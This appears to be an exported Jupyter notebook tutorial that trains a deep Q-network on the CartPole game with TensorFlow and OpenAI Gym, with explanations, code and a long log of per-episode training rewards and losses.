#!/usr/bin/env python
# coding: utf-8
# # Deep $Q$-learning
#
# In this notebook, we'll build a neural network that can learn to play games through reinforcement learning. More specifically, we'll use $Q$-learning to train an agent to play a game called [Cart-Pole](https://gym.openai.com/envs/CartPole-v0). In this game, a freely swinging pole is attached to a cart. The cart can move to the left and right, and the goal is to keep the pole upright as long as possible.
#
# 
#
# We can simulate this game using [OpenAI Gym](https://github.com/openai/gym). First, let's check out how OpenAI Gym works. Then, we'll get into training an agent to play the Cart-Pole game.
# In[10]:
import gym
import numpy as np
import sys
# Create the Cart-Pole game environment
env = gym.make('CartPole-v1')
# Number of possible actions
print('Number of possible actions:', env.action_space.n)
# In[ ]:
[2018-01-22 23:10:02,350] Making new env: CartPole-v1
Number of possible actions: 2
# We interact with the simulation through `env`. You can see how many actions are possible from `env.action_space.n`, and to get a random action you can use `env.action_space.sample()`. Passing in an action as an integer to `env.step` will generate the next step in the simulation. This is general to all Gym games.
#
# In the Cart-Pole game, there are two possible actions: moving the cart left or right, encoded as 0 and 1 respectively.
#
# Run the code below to interact with the environment.
# In[2]:
actions = []  # actions that the agent selects
rewards = []  # obtained rewards

state = env.reset()
while True:
    action = env.action_space.sample()  # choose a random action
    state, reward, done, _ = env.step(action)
    rewards.append(reward)
    actions.append(action)
    if done:
        break
# We can look at the actions and rewards:
# In[3]:
print('Actions:', actions)
print('Rewards:', rewards)
# In[ ]:
Actions: [0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0]
Rewards: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]
# The game resets after the pole has fallen past a certain angle. For each step while the game is running, it returns a reward of 1.0. The longer the game runs, the more reward we get. Then, our network's goal is to maximize the reward by keeping the pole vertical. It will do this by moving the cart to the left and the right.
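#
# As a quick sanity check: since every step returns a reward of 1.0, the total reward of a random run simply equals the episode length.
# In[ ]:
print('Episode length:', len(actions))
print('Total reward:', sum(rewards))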
#
# ## $Q$-Network
#
# To keep track of the action values, we'll use a neural network that accepts a state $s$ as input. The output will be $Q$-values for each available action $a$ (i.e., the output is **all** action values $Q(s,a)$ _corresponding to the input state $s$_).
#
# <img src="assets/q-network.png" width=550px>
#
# For this Cart-Pole game, the state has four values: the position and velocity of the cart, and the position and velocity of the pole. Thus, the neural network has **four inputs**, one for each value in the state, and **two outputs**, one for each possible action.
#
# As explored in the lesson, to get the training target, we'll first use the context provided by the state $s$ to choose an action $a$, then simulate the game using that action. This will get us the next state, $s'$, and the reward $r$. With that, we can calculate $\hat{Q}(s,a) = r + \gamma \max_{a'}{Q(s', a')}$. Then we update the weights by minimizing $(\hat{Q}(s,a) - Q(s,a))^2$.
#
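# To make the target computation concrete, here is a small NumPy-only sketch (the values below are made up for illustration) of how $\hat{Q}$ is formed for a mini-batch of three transitions:
# In[ ]:
# toy values: per-transition rewards, next-state Q-values, and done flags
toy_rewards = np.array([1.0, 1.0, 1.0])
toy_next_Qs = np.array([[0.5, 0.7],
                        [0.2, 0.1],
                        [0.0, 0.0]])   # terminal state: Q-values zeroed out
toy_dones = np.array([False, False, True])

# target = r + gamma * max_a' Q(s', a'), with no bootstrapping past a terminal state
toy_targets = toy_rewards + 0.99 * np.max(toy_next_Qs, axis=1) * (1 - toy_dones)
print(toy_targets)  # [1.693 1.198 1.   ]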
# Below is one implementation of the $Q$-network. It uses two fully connected layers with ReLU activations. Two seems to be good enough, three might be better. Feel free to try it out.
# In[4]:
import tensorflow as tf

class QNetwork:
    def __init__(self, learning_rate=0.01, state_size=4,
                 action_size=2, hidden_size=10,
                 name='QNetwork'):
        # state inputs to the Q-network
        with tf.variable_scope(name):
            self.inputs_ = tf.placeholder(tf.float32, [None, state_size], name='inputs')

            # One hot encode the actions to later choose the Q-value for the action
            self.actions_ = tf.placeholder(tf.int32, [None], name='actions')
            one_hot_actions = tf.one_hot(self.actions_, action_size)

            # Target Q values for training
            self.targetQs_ = tf.placeholder(tf.float32, [None], name='target')

            # ReLU hidden layers
            self.fc1 = tf.contrib.layers.fully_connected(self.inputs_, hidden_size)
            self.fc2 = tf.contrib.layers.fully_connected(self.fc1, hidden_size)

            # Linear output layer
            self.output = tf.contrib.layers.fully_connected(self.fc2, action_size,
                                                            activation_fn=None)

            ### Train with loss (targetQ - Q)^2
            # output has length 2, for two actions. This next line chooses
            # one value from output (per row) according to the one-hot encoded actions.
            self.Q = tf.reduce_sum(tf.multiply(self.output, one_hot_actions), axis=1)
            self.loss = tf.reduce_mean(tf.square(self.targetQs_ - self.Q))
            self.opt = tf.train.AdamOptimizer(learning_rate).minimize(self.loss)
# ## Experience replay
#
# Reinforcement learning algorithms can have stability issues due to correlations between states. To reduce correlations when training, we can store the agent's experiences and later draw a random mini-batch of those experiences to train on.
#
# Here, we'll create a `Memory` object that will store our experiences, our transitions $<s, a, r, s'>$. This memory will have a maximum capacity, so we can keep newer experiences in memory while getting rid of older experiences. Then, we'll sample a random mini-batch of transitions $<s, a, r, s'>$ and train on those.
#
# Below, I've implemented a `Memory` object. If you're unfamiliar with `deque`, this is a double-ended queue. You can think of it like a tube open on both sides. You can put objects in either side of the tube. But if it's full, adding anything more will push an object out the other side. This is a great data structure to use for the memory buffer.
# In[5]:
from collections import deque

class Memory():
    def __init__(self, max_size=1000):
        self.buffer = deque(maxlen=max_size)

    def add(self, experience):
        self.buffer.append(experience)

    def sample(self, batch_size):
        idx = np.random.choice(np.arange(len(self.buffer)),
                               size=batch_size,
                               replace=False)
        return [self.buffer[ii] for ii in idx]
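# A tiny demonstration of the deque behavior described above: once the buffer is full, adding a new experience silently drops the oldest one.
# In[ ]:
small_memory = Memory(max_size=3)
for experience in range(5):
    small_memory.add(experience)
print(list(small_memory.buffer))   # [2, 3, 4] -- experiences 0 and 1 were pushed out
print(small_memory.sample(2))      # two random stored experiences, e.g. [4, 2]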
# ## $Q$-Learning training algorithm
#
# We will use the algorithm below to train the network. For this game, the goal is to keep the pole upright for 195 frames, so we can start a new episode once that goal is met. The game ends if the pole tilts over too far, or if the cart moves too far to the left or right. When a game ends, we'll start a new episode. Now, to train the agent:
#
# * Initialize the memory $D$
# * Initialize the action-value network $Q$ with random weights
# * **For** episode $\leftarrow 1$ **to** $M$ **do**
# * Observe $s_0$
# * **For** $t \leftarrow 0$ **to** $T-1$ **do**
# * With probability $\epsilon$ select a random action $a_t$, otherwise select $a_t = \mathrm{argmax}_a Q(s_t,a)$
# * Execute action $a_t$ in simulator and observe reward $r_{t+1}$ and new state $s_{t+1}$
# * Store transition $<s_t, a_t, r_{t+1}, s_{t+1}>$ in memory $D$
# * Sample random mini-batch from $D$: $<s_j, a_j, r_j, s'_j>$
# * Set $\hat{Q}_j = r_j$ if the episode ends at $j+1$, otherwise set $\hat{Q}_j = r_j + \gamma \max_{a'}{Q(s'_j, a')}$
# * Make a gradient descent step with loss $(\hat{Q}_j - Q(s_j, a_j))^2$
# * **endfor**
# * **endfor**
#
# You are welcome (and encouraged!) to take the time to extend this code to implement some of the improvements that we discussed in the lesson, such as fixed $Q$ targets, double DQNs, prioritized replay, and/or dueling networks.
#
# ## Hyperparameters
#
# One of the more difficult aspects of reinforcement learning is the large number of hyperparameters. Not only are we tuning the network, but we're tuning the simulation.
# In[6]:
train_episodes = 1000 # max number of episodes to learn from
max_steps = 200 # max steps in an episode
gamma = 0.99 # future reward discount
# Exploration parameters
explore_start = 1.0 # exploration probability at start
explore_stop = 0.01 # minimum exploration probability
decay_rate = 0.0001 # exponential decay rate for exploration prob
# Network parameters
hidden_size = 64 # number of units in each Q-network hidden layer
learning_rate = 0.0001 # Q-network learning rate
# Memory parameters
memory_size = 10000 # memory capacity
batch_size = 20 # experience mini-batch size
pretrain_length = batch_size # number experiences to pretrain the memory
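# To get a feel for `decay_rate`, we can evaluate the same exponential schedule used in the training loop below at a few step counts:
# In[ ]:
for step in [0, 1000, 10000, 50000]:
    explore_p = explore_stop + (explore_start - explore_stop) * np.exp(-decay_rate * step)
    print('step {:>6}: explore_p = {:.3f}'.format(step, explore_p))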
# In[7]:
tf.reset_default_graph()
mainQN = QNetwork(name='main', hidden_size=hidden_size, learning_rate=learning_rate)
# ## Populate the experience memory
#
# Here we re-initialize the simulation and pre-populate the memory. The agent is taking random actions and storing the transitions in memory. This will help the agent with exploring the game.
# In[12]:
# Initialize the simulation
env.reset()
# Take one random step to get the pole and cart moving
state, reward, done, _ = env.step(env.action_space.sample())

memory = Memory(max_size=memory_size)

# Make a bunch of random actions and store the experiences
for ii in range(pretrain_length):
    # Make a random action
    action = env.action_space.sample()
    next_state, reward, done, _ = env.step(action)

    if done:
        # The simulation fails so no next state
        next_state = np.zeros(state.shape)
        # Add experience to memory
        memory.add((state, action, reward, next_state))

        # Start new episode
        env.reset()
        # Take one random step to get the pole and cart moving
        state, reward, done, _ = env.step(env.action_space.sample())
    else:
        # Add experience to memory
        memory.add((state, action, reward, next_state))
        state = next_state
# ## Training
#
# Below we'll train our agent.
# In[13]:
# Now train with experiences
saver = tf.train.Saver()
rewards_list = []
with tf.Session() as sess:
    # Initialize variables
    sess.run(tf.global_variables_initializer())

    step = 0
    loss = 0.0  # so the first status print works even if the first episode ends immediately
    for ep in range(1, train_episodes):
        total_reward = 0
        t = 0
        while t < max_steps:
            step += 1
            # Uncomment this next line to watch the training
            # env.render()

            # Explore or Exploit
            explore_p = explore_stop + (explore_start - explore_stop)*np.exp(-decay_rate*step)
            if explore_p > np.random.rand():
                # Make a random action
                action = env.action_space.sample()
            else:
                # Get action from Q-network
                feed = {mainQN.inputs_: state.reshape((1, *state.shape))}
                Qs = sess.run(mainQN.output, feed_dict=feed)
                action = np.argmax(Qs)

            # Take action, get new state and reward
            next_state, reward, done, _ = env.step(action)

            total_reward += reward

            if done:
                # the episode ends so no next state
                next_state = np.zeros(state.shape)
                t = max_steps

                print('\rEpisode: {}'.format(ep),
                      'Total reward: {}'.format(total_reward),
                      'Training loss: {:.4f}'.format(loss),
                      'Explore P: {:.4f}'.format(explore_p), end="")
                sys.stdout.flush()

                rewards_list.append((ep, total_reward))

                # Add experience to memory
                memory.add((state, action, reward, next_state))

                # Start new episode
                env.reset()
                # Take one random step to get the pole and cart moving
                state, reward, done, _ = env.step(env.action_space.sample())
            else:
                # Add experience to memory
                memory.add((state, action, reward, next_state))
                state = next_state
                t += 1

            # Sample mini-batch from memory
            batch = memory.sample(batch_size)
            states = np.array([each[0] for each in batch])
            actions = np.array([each[1] for each in batch])
            rewards = np.array([each[2] for each in batch])
            next_states = np.array([each[3] for each in batch])

            # Train network
            target_Qs = sess.run(mainQN.output, feed_dict={mainQN.inputs_: next_states})

            # Set target_Qs to 0 for states where episode ends
            episode_ends = (next_states == np.zeros(states[0].shape)).all(axis=1)
            target_Qs[episode_ends] = (0, 0)

            targets = rewards + gamma * np.max(target_Qs, axis=1)

            loss, _ = sess.run([mainQN.loss, mainQN.opt],
                               feed_dict={mainQN.inputs_: states,
                                          mainQN.targetQs_: targets,
                                          mainQN.actions_: actions})

    saver.save(sess, "checkpoints/cartpole.ckpt")
# In[ ]:
Episode: 1 Total reward: 13.0 Training loss: 1.0202 Explore P: 0.9987
Episode: 2 Total reward: 13.0 Training loss: 1.0752 Explore P: 0.9974
Episode: 3 Total reward: 9.0 Training loss: 1.0600 Explore P: 0.9965
Episode: 4 Total reward: 17.0 Training loss: 1.0429 Explore P: 0.9949
Episode: 5 Total reward: 16.0 Training loss: 1.0519 Explore P: 0.9933
Episode: 6 Total reward: 15.0 Training loss: 1.0574 Explore P: 0.9918
Episode: 7 Total reward: 12.0 Training loss: 1.0889 Explore P: 0.9906
Episode: 8 Total reward: 27.0 Training loss: 1.0859 Explore P: 0.9880
Episode: 9 Total reward: 24.0 Training loss: 1.2007 Explore P: 0.9857
Episode: 10 Total reward: 17.0 Training loss: 1.1116 Explore P: 0.9840
Episode: 11 Total reward: 12.0 Training loss: 1.0739 Explore P: 0.9828
Episode: 12 Total reward: 25.0 Training loss: 1.0805 Explore P: 0.9804
Episode: 13 Total reward: 23.0 Training loss: 1.0628 Explore P: 0.9782
Episode: 14 Total reward: 31.0 Training loss: 1.0248 Explore P: 0.9752
Episode: 15 Total reward: 15.0 Training loss: 0.9859 Explore P: 0.9737
Episode: 16 Total reward: 12.0 Training loss: 1.0983 Explore P: 0.9726
Episode: 17 Total reward: 16.0 Training loss: 1.4343 Explore P: 0.9710
Episode: 18 Total reward: 21.0 Training loss: 1.2696 Explore P: 0.9690
Episode: 19 Total reward: 15.0 Training loss: 1.3542 Explore P: 0.9676
Episode: 20 Total reward: 15.0 Training loss: 1.2635 Explore P: 0.9661
Episode: 21 Total reward: 16.0 Training loss: 1.3648 Explore P: 0.9646
Episode: 22 Total reward: 43.0 Training loss: 1.6088 Explore P: 0.9605
Episode: 23 Total reward: 7.0 Training loss: 1.5027 Explore P: 0.9599
Episode: 24 Total reward: 13.0 Training loss: 1.7275 Explore P: 0.9586
Episode: 25 Total reward: 18.0 Training loss: 1.3902 Explore P: 0.9569
Episode: 26 Total reward: 27.0 Training loss: 2.5874 Explore P: 0.9544
Episode: 27 Total reward: 32.0 Training loss: 1.5907 Explore P: 0.9513
Episode: 28 Total reward: 17.0 Training loss: 2.1144 Explore P: 0.9497
Episode: 29 Total reward: 34.0 Training loss: 1.7340 Explore P: 0.9466
Episode: 30 Total reward: 18.0 Training loss: 2.5100 Explore P: 0.9449
Episode: 31 Total reward: 15.0 Training loss: 2.0166 Explore P: 0.9435
Episode: 32 Total reward: 11.0 Training loss: 1.8675 Explore P: 0.9424
Episode: 33 Total reward: 18.0 Training loss: 4.0481 Explore P: 0.9408
Episode: 34 Total reward: 10.0 Training loss: 4.0895 Explore P: 0.9398
Episode: 35 Total reward: 15.0 Training loss: 2.1252 Explore P: 0.9384
Episode: 36 Total reward: 14.0 Training loss: 4.7765 Explore P: 0.9371
Episode: 37 Total reward: 16.0 Training loss: 3.3848 Explore P: 0.9357
Episode: 38 Total reward: 21.0 Training loss: 3.9125 Explore P: 0.9337
Episode: 39 Total reward: 16.0 Training loss: 2.6183 Explore P: 0.9322
Episode: 40 Total reward: 20.0 Training loss: 5.4929 Explore P: 0.9304
Episode: 41 Total reward: 18.0 Training loss: 3.6606 Explore P: 0.9287
Episode: 42 Total reward: 17.0 Training loss: 4.5812 Explore P: 0.9272
Episode: 43 Total reward: 10.0 Training loss: 3.7633 Explore P: 0.9263
Episode: 44 Total reward: 8.0 Training loss: 4.6176 Explore P: 0.9255
Episode: 45 Total reward: 39.0 Training loss: 4.2732 Explore P: 0.9220
Episode: 46 Total reward: 18.0 Training loss: 4.0041 Explore P: 0.9203
Episode: 47 Total reward: 11.0 Training loss: 4.4035 Explore P: 0.9193
Episode: 48 Total reward: 25.0 Training loss: 5.4287 Explore P: 0.9171
Episode: 49 Total reward: 19.0 Training loss: 9.6972 Explore P: 0.9153
Episode: 50 Total reward: 11.0 Training loss: 16.3460 Explore P: 0.9143
Episode: 51 Total reward: 11.0 Training loss: 13.4854 Explore P: 0.9133
Episode: 52 Total reward: 12.0 Training loss: 12.8016 Explore P: 0.9123
Episode: 53 Total reward: 13.0 Training loss: 5.8589 Explore P: 0.9111
Episode: 54 Total reward: 12.0 Training loss: 8.5924 Explore P: 0.9100
Episode: 55 Total reward: 19.0 Training loss: 8.6204 Explore P: 0.9083
Episode: 56 Total reward: 36.0 Training loss: 14.2701 Explore P: 0.9051
Episode: 57 Total reward: 9.0 Training loss: 4.5481 Explore P: 0.9043
Episode: 58 Total reward: 22.0 Training loss: 12.9695 Explore P: 0.9023
Episode: 59 Total reward: 36.0 Training loss: 11.2639 Explore P: 0.8991
Episode: 60 Total reward: 16.0 Training loss: 7.7648 Explore P: 0.8977
Episode: 61 Total reward: 31.0 Training loss: 4.6997 Explore P: 0.8949
Episode: 62 Total reward: 13.0 Training loss: 5.9755 Explore P: 0.8938
Episode: 63 Total reward: 10.0 Training loss: 39.1040 Explore P: 0.8929
Episode: 64 Total reward: 14.0 Training loss: 23.2767 Explore P: 0.8917
Episode: 65 Total reward: 12.0 Training loss: 9.3477 Explore P: 0.8906
Episode: 66 Total reward: 20.0 Training loss: 6.4336 Explore P: 0.8888
Episode: 67 Total reward: 29.0 Training loss: 17.1522 Explore P: 0.8863
Episode: 68 Total reward: 13.0 Training loss: 39.3250 Explore P: 0.8852
Episode: 69 Total reward: 20.0 Training loss: 6.2099 Explore P: 0.8834
Episode: 70 Total reward: 15.0 Training loss: 20.9229 Explore P: 0.8821
Episode: 71 Total reward: 27.0 Training loss: 24.7817 Explore P: 0.8797
Episode: 72 Total reward: 12.0 Training loss: 20.7842 Explore P: 0.8787
Episode: 73 Total reward: 15.0 Training loss: 12.3202 Explore P: 0.8774
Episode: 74 Total reward: 31.0 Training loss: 9.2270 Explore P: 0.8747
Episode: 75 Total reward: 13.0 Training loss: 19.8264 Explore P: 0.8736
Episode: 76 Total reward: 20.0 Training loss: 72.9411 Explore P: 0.8719
Episode: 77 Total reward: 27.0 Training loss: 5.2214 Explore P: 0.8695
Episode: 78 Total reward: 14.0 Training loss: 39.3913 Explore P: 0.8683
Episode: 79 Total reward: 16.0 Training loss: 7.9491 Explore P: 0.8670
Episode: 80 Total reward: 18.0 Training loss: 10.8364 Explore P: 0.8654
Episode: 81 Total reward: 16.0 Training loss: 22.2031 Explore P: 0.8641
Episode: 82 Total reward: 21.0 Training loss: 23.6590 Explore P: 0.8623
Episode: 83 Total reward: 13.0 Training loss: 8.4819 Explore P: 0.8612
Episode: 84 Total reward: 10.0 Training loss: 13.3548 Explore P: 0.8603
Episode: 85 Total reward: 13.0 Training loss: 18.0272 Explore P: 0.8592
Episode: 86 Total reward: 24.0 Training loss: 42.1243 Explore P: 0.8572
Episode: 87 Total reward: 9.0 Training loss: 30.8526 Explore P: 0.8564
Episode: 88 Total reward: 22.0 Training loss: 36.6084 Explore P: 0.8546
Episode: 89 Total reward: 7.0 Training loss: 10.5430 Explore P: 0.8540
Episode: 90 Total reward: 12.0 Training loss: 25.5808 Explore P: 0.8529
Episode: 91 Total reward: 17.0 Training loss: 47.3073 Explore P: 0.8515
Episode: 92 Total reward: 21.0 Training loss: 7.9998 Explore P: 0.8498
Episode: 93 Total reward: 15.0 Training loss: 66.6464 Explore P: 0.8485
Episode: 94 Total reward: 17.0 Training loss: 95.6354 Explore P: 0.8471
Episode: 95 Total reward: 23.0 Training loss: 57.4714 Explore P: 0.8451
Episode: 96 Total reward: 11.0 Training loss: 40.7717 Explore P: 0.8442
Episode: 97 Total reward: 13.0 Training loss: 43.3380 Explore P: 0.8431
Episode: 98 Total reward: 9.0 Training loss: 10.8368 Explore P: 0.8424
Episode: 99 Total reward: 21.0 Training loss: 57.7325 Explore P: 0.8406
Episode: 100 Total reward: 11.0 Training loss: 9.7291 Explore P: 0.8397
Episode: 101 Total reward: 10.0 Training loss: 10.4052 Explore P: 0.8389
Episode: 102 Total reward: 26.0 Training loss: 60.4829 Explore P: 0.8368
Episode: 103 Total reward: 34.0 Training loss: 9.0924 Explore P: 0.8339
Episode: 104 Total reward: 30.0 Training loss: 178.0664 Explore P: 0.8315
Episode: 105 Total reward: 14.0 Training loss: 9.0423 Explore P: 0.8303
Episode: 106 Total reward: 18.0 Training loss: 126.9380 Explore P: 0.8289
Episode: 107 Total reward: 11.0 Training loss: 58.9921 Explore P: 0.8280
Episode: 108 Total reward: 20.0 Training loss: 9.1945 Explore P: 0.8263
Episode: 109 Total reward: 9.0 Training loss: 9.2887 Explore P: 0.8256
Episode: 110 Total reward: 29.0 Training loss: 20.7970 Explore P: 0.8232
Episode: 111 Total reward: 17.0 Training loss: 144.6258 Explore P: 0.8218
Episode: 112 Total reward: 15.0 Training loss: 82.4089 Explore P: 0.8206
Episode: 113 Total reward: 15.0 Training loss: 39.9963 Explore P: 0.8194
Episode: 114 Total reward: 8.0 Training loss: 9.8394 Explore P: 0.8188
Episode: 115 Total reward: 29.0 Training loss: 76.9930 Explore P: 0.8164
Episode: 116 Total reward: 21.0 Training loss: 25.0172 Explore P: 0.8147
Episode: 117 Total reward: 24.0 Training loss: 143.5481 Explore P: 0.8128
Episode: 118 Total reward: 35.0 Training loss: 86.5429 Explore P: 0.8100
Episode: 119 Total reward: 28.0 Training loss: 8.4315 Explore P: 0.8078
Episode: 120 Total reward: 13.0 Training loss: 25.7062 Explore P: 0.8067
Episode: 121 Total reward: 9.0 Training loss: 6.5005 Explore P: 0.8060
Episode: 122 Total reward: 32.0 Training loss: 90.7984 Explore P: 0.8035
Episode: 123 Total reward: 21.0 Training loss: 130.2779 Explore P: 0.8018
Episode: 124 Total reward: 15.0 Training loss: 167.6294 Explore P: 0.8006
Episode: 125 Total reward: 15.0 Training loss: 74.7611 Explore P: 0.7994
Episode: 126 Total reward: 20.0 Training loss: 119.3178 Explore P: 0.7978
Episode: 127 Total reward: 18.0 Training loss: 196.5175 Explore P: 0.7964
Episode: 128 Total reward: 8.0 Training loss: 45.2131 Explore P: 0.7958
Episode: 129 Total reward: 24.0 Training loss: 86.0374 Explore P: 0.7939
Episode: 130 Total reward: 11.0 Training loss: 7.8129 Explore P: 0.7931
Episode: 131 Total reward: 11.0 Training loss: 76.8442 Explore P: 0.7922
Episode: 132 Total reward: 28.0 Training loss: 196.6863 Explore P: 0.7900
Episode: 133 Total reward: 9.0 Training loss: 45.7586 Explore P: 0.7893
Episode: 134 Total reward: 21.0 Training loss: 5.8484 Explore P: 0.7877
Episode: 135 Total reward: 10.0 Training loss: 7.3919 Explore P: 0.7869
Episode: 136 Total reward: 17.0 Training loss: 12.3142 Explore P: 0.7856
Episode: 137 Total reward: 16.0 Training loss: 75.7170 Explore P: 0.7843
Episode: 138 Total reward: 12.0 Training loss: 145.3568 Explore P: 0.7834
Episode: 139 Total reward: 27.0 Training loss: 121.1114 Explore P: 0.7813
Episode: 140 Total reward: 26.0 Training loss: 7.3243 Explore P: 0.7793
Episode: 141 Total reward: 40.0 Training loss: 10.6523 Explore P: 0.7762
Episode: 142 Total reward: 14.0 Training loss: 6.9482 Explore P: 0.7752
Episode: 143 Total reward: 24.0 Training loss: 137.7784 Explore P: 0.7733
Episode: 144 Total reward: 12.0 Training loss: 98.8381 Explore P: 0.7724
Episode: 145 Total reward: 8.0 Training loss: 14.1739 Explore P: 0.7718
Episode: 146 Total reward: 51.0 Training loss: 69.1545 Explore P: 0.7679
Episode: 147 Total reward: 29.0 Training loss: 249.9989 Explore P: 0.7657
Episode: 148 Total reward: 9.0 Training loss: 140.8663 Explore P: 0.7651
Episode: 149 Total reward: 13.0 Training loss: 141.5930 Explore P: 0.7641
Episode: 150 Total reward: 19.0 Training loss: 12.6228 Explore P: 0.7627
Episode: 151 Total reward: 19.0 Training loss: 136.3315 Explore P: 0.7612
Episode: 152 Total reward: 10.0 Training loss: 110.3699 Explore P: 0.7605
Episode: 153 Total reward: 18.0 Training loss: 8.3900 Explore P: 0.7591
Episode: 154 Total reward: 18.0 Training loss: 96.3717 Explore P: 0.7578
Episode: 155 Total reward: 7.0 Training loss: 6.0889 Explore P: 0.7573
Episode: 156 Total reward: 15.0 Training loss: 126.7419 Explore P: 0.7561
Episode: 157 Total reward: 15.0 Training loss: 67.2544 Explore P: 0.7550
Episode: 158 Total reward: 26.0 Training loss: 12.2839 Explore P: 0.7531
Episode: 159 Total reward: 20.0 Training loss: 5.8118 Explore P: 0.7516
Episode: 160 Total reward: 10.0 Training loss: 96.4570 Explore P: 0.7509
Episode: 161 Total reward: 23.0 Training loss: 7.6207 Explore P: 0.7492
Episode: 162 Total reward: 18.0 Training loss: 66.5249 Explore P: 0.7478
Episode: 163 Total reward: 18.0 Training loss: 111.3273 Explore P: 0.7465
Episode: 164 Total reward: 21.0 Training loss: 11.5292 Explore P: 0.7450
Episode: 165 Total reward: 17.0 Training loss: 6.3130 Explore P: 0.7437
Episode: 166 Total reward: 22.0 Training loss: 153.8167 Explore P: 0.7421
Episode: 167 Total reward: 17.0 Training loss: 7.0915 Explore P: 0.7408
Episode: 168 Total reward: 34.0 Training loss: 228.3831 Explore P: 0.7384
Episode: 169 Total reward: 13.0 Training loss: 8.5996 Explore P: 0.7374
Episode: 170 Total reward: 13.0 Training loss: 90.8898 Explore P: 0.7365
Episode: 171 Total reward: 20.0 Training loss: 4.8179 Explore P: 0.7350
Episode: 172 Total reward: 9.0 Training loss: 6.2508 Explore P: 0.7344
Episode: 173 Total reward: 14.0 Training loss: 5.2401 Explore P: 0.7334
Episode: 174 Total reward: 12.0 Training loss: 3.9268 Explore P: 0.7325
Episode: 175 Total reward: 12.0 Training loss: 5.6376 Explore P: 0.7316
Episode: 176 Total reward: 11.0 Training loss: 44.5308 Explore P: 0.7308
Episode: 177 Total reward: 12.0 Training loss: 4.9717 Explore P: 0.7300
Episode: 178 Total reward: 9.0 Training loss: 181.0085 Explore P: 0.7293
Episode: 179 Total reward: 11.0 Training loss: 73.1134 Explore P: 0.7285
Episode: 180 Total reward: 13.0 Training loss: 87.3085 Explore P: 0.7276
Episode: 181 Total reward: 12.0 Training loss: 121.6627 Explore P: 0.7267
Episode: 182 Total reward: 12.0 Training loss: 58.1967 Explore P: 0.7259
Episode: 183 Total reward: 13.0 Training loss: 85.1540 Explore P: 0.7249
Episode: 184 Total reward: 16.0 Training loss: 5.1214 Explore P: 0.7238
Episode: 185 Total reward: 19.0 Training loss: 69.1839 Explore P: 0.7224
Episode: 186 Total reward: 7.0 Training loss: 63.2256 Explore P: 0.7219
Episode: 187 Total reward: 17.0 Training loss: 73.2788 Explore P: 0.7207
Episode: 188 Total reward: 15.0 Training loss: 78.6213 Explore P: 0.7197
Episode: 189 Total reward: 11.0 Training loss: 88.5211 Explore P: 0.7189
Episode: 190 Total reward: 14.0 Training loss: 60.1332 Explore P: 0.7179
Episode: 191 Total reward: 15.0 Training loss: 135.7724 Explore P: 0.7168
Episode: 192 Total reward: 15.0 Training loss: 156.9691 Explore P: 0.7158
Episode: 193 Total reward: 17.0 Training loss: 93.3756 Explore P: 0.7146
Episode: 194 Total reward: 12.0 Training loss: 3.0462 Explore P: 0.7137
Episode: 195 Total reward: 9.0 Training loss: 119.2650 Explore P: 0.7131
Episode: 196 Total reward: 13.0 Training loss: 66.6383 Explore P: 0.7122
Episode: 197 Total reward: 9.0 Training loss: 113.7849 Explore P: 0.7116
Episode: 198 Total reward: 13.0 Training loss: 54.6072 Explore P: 0.7106
Episode: 199 Total reward: 19.0 Training loss: 54.8980 Explore P: 0.7093
Episode: 200 Total reward: 20.0 Training loss: 155.5480 Explore P: 0.7079
Episode: 201 Total reward: 10.0 Training loss: 45.8685 Explore P: 0.7072
Episode: 202 Total reward: 14.0 Training loss: 53.5145 Explore P: 0.7062
Episode: 203 Total reward: 8.0 Training loss: 107.9623 Explore P: 0.7057
Episode: 204 Total reward: 21.0 Training loss: 40.2749 Explore P: 0.7042
Episode: 205 Total reward: 32.0 Training loss: 43.2627 Explore P: 0.7020
Episode: 206 Total reward: 9.0 Training loss: 55.5398 Explore P: 0.7014
Episode: 207 Total reward: 15.0 Training loss: 1.9959 Explore P: 0.7004
Episode: 208 Total reward: 12.0 Training loss: 105.3751 Explore P: 0.6995
Episode: 209 Total reward: 11.0 Training loss: 40.8319 Explore P: 0.6988
Episode: 210 Total reward: 10.0 Training loss: 89.7147 Explore P: 0.6981
Episode: 211 Total reward: 10.0 Training loss: 1.1946 Explore P: 0.6974
Episode: 212 Total reward: 10.0 Training loss: 80.6916 Explore P: 0.6967
Episode: 213 Total reward: 24.0 Training loss: 88.0977 Explore P: 0.6951
Episode: 214 Total reward: 14.0 Training loss: 46.4105 Explore P: 0.6941
Episode: 215 Total reward: 11.0 Training loss: 40.3726 Explore P: 0.6933
Episode: 216 Total reward: 11.0 Training loss: 3.0770 Explore P: 0.6926
Episode: 217 Total reward: 8.0 Training loss: 1.7495 Explore P: 0.6921
Episode: 218 Total reward: 16.0 Training loss: 1.5615 Explore P: 0.6910
Episode: 219 Total reward: 17.0 Training loss: 2.0250 Explore P: 0.6898
Episode: 220 Total reward: 18.0 Training loss: 37.8432 Explore P: 0.6886
Episode: 221 Total reward: 17.0 Training loss: 1.9049 Explore P: 0.6874
Episode: 222 Total reward: 16.0 Training loss: 1.9652 Explore P: 0.6863
Episode: 223 Total reward: 16.0 Training loss: 1.4384 Explore P: 0.6853
Episode: 224 Total reward: 27.0 Training loss: 66.0615 Explore P: 0.6834
Episode: 225 Total reward: 9.0 Training loss: 0.8478 Explore P: 0.6828
Episode: 226 Total reward: 14.0 Training loss: 1.0319 Explore P: 0.6819
Episode: 227 Total reward: 17.0 Training loss: 97.6957 Explore P: 0.6808
Episode: 228 Total reward: 8.0 Training loss: 68.0521 Explore P: 0.6802
Episode: 229 Total reward: 9.0 Training loss: 110.8437 Explore P: 0.6796
Episode: 230 Total reward: 19.0 Training loss: 1.6856 Explore P: 0.6783
Episode: 231 Total reward: 9.0 Training loss: 2.0634 Explore P: 0.6777
Episode: 232 Total reward: 11.0 Training loss: 32.0714 Explore P: 0.6770
Episode: 233 Total reward: 9.0 Training loss: 2.0387 Explore P: 0.6764
Episode: 234 Total reward: 13.0 Training loss: 66.9349 Explore P: 0.6755
Episode: 235 Total reward: 14.0 Training loss: 110.6725 Explore P: 0.6746
Episode: 236 Total reward: 18.0 Training loss: 1.0585 Explore P: 0.6734
Episode: 237 Total reward: 11.0 Training loss: 117.0101 Explore P: 0.6727
Episode: 238 Total reward: 7.0 Training loss: 2.6115 Explore P: 0.6722
Episode: 239 Total reward: 10.0 Training loss: 124.7320 Explore P: 0.6716
Episode: 240 Total reward: 18.0 Training loss: 2.5475 Explore P: 0.6704
